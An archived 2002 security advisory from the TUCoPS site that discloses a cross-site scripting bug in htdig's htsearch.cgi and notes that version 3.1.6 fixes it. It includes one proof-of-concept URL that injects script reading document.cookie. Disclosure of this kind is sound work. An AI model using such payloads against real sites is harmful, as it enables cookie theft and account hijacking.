TUCoPS :: Unix :: General :: unix5490.htm


TUCoPS :: Unix :: General :: unix5490.htm

htdig cross site scripting bug
27th Jun 2002 [SBWID-5490]
COMMAND
	htdig cross site scripting bug
SYSTEMS AFFECTED
	htdig all releases up to 3.1.5 ??
PROBLEM
	Howard Yeend found :
	
	http://<webserver>/cgi-bin/htsearch.cgi?words=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E
	
	
	Will trigger the cross site scripting bug.
SOLUTION
	 Update (01 July 2002)
	 ======
	
	Peter Watkins [http://www.tux.org/~peterw/ ] says version 3.1.6 is
	imune

AltStyle によって変換されたページ (->オリジナル) /

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH